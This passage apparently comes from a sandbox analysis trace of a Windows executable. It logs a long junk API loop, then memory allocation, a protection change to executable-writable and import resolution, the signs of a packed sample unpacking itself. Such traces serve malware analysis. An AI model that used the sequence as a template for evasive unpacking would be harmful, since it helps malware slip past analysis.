lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.505] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.505] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.505] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.506] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.506] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.506] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.507] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.507] AddAtomA (lpString=0x0) returned 0x0 [0129.507] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.508] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.508] AddAtomA (lpString=0x0) returned 0x0 [0129.508] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.509] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.509] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.509] AddAtomA (lpString=0x0) returned 0x0 [0129.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.510] AddAtomA (lpString=0x0) returned 0x0 [0129.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.510] AddAtomA (lpString=0x0) returned 0x0 [0129.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.510] AddAtomA (lpString=0x0) returned 0x0 [0129.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.510] AddAtomA (lpString=0x0) returned 0x0 [0129.510] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.510] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.511] AddAtomA (lpString=0x0) returned 0x0 [0129.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.511] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.511] AddAtomA (lpString=0x0) returned 0x0 [0129.511] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.512] AddAtomA (lpString=0x0) returned 0x0 [0129.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.512] AddAtomA (lpString=0x0) returned 0x0 [0129.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.512] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.512] AddAtomA (lpString=0x0) returned 0x0 [0129.512] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.513] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.513] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.513] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.514] AddAtomA (lpString=0x0) returned 0x0 [0129.514] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.514] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.515] AddAtomA (lpString=0x0) returned 0x0 [0129.515] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.515] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.516] AddAtomA (lpString=0x0) returned 0x0 [0129.516] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0129.516] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x26 [0129.540] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.541] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0129.541] SetErrorMode (uMode=0x400) returned 0x0 [0129.541] SetErrorMode (uMode=0x0) returned 0x400 [0129.541] GetVersionExA (in: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e568*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0129.542] VirtualAlloc (lpAddress=0x0, dwSize=0x2d800, flAllocationType=0x1000, flProtect=0x4) returned 0x220000 [0129.545] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5f0 | out: lpflOldProtect=0x18f5f0*=0x2) returned 1 [0129.651] VirtualFree (lpAddress=0x220000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.653] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0129.653] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0129.654] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0129.655] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0129.691] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0129.692] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0129.693] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0129.694] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.694] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0129.695] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0129.695] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0129.695] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.695] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0129.695] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0129.695] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0129.699] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0129.699] atexit 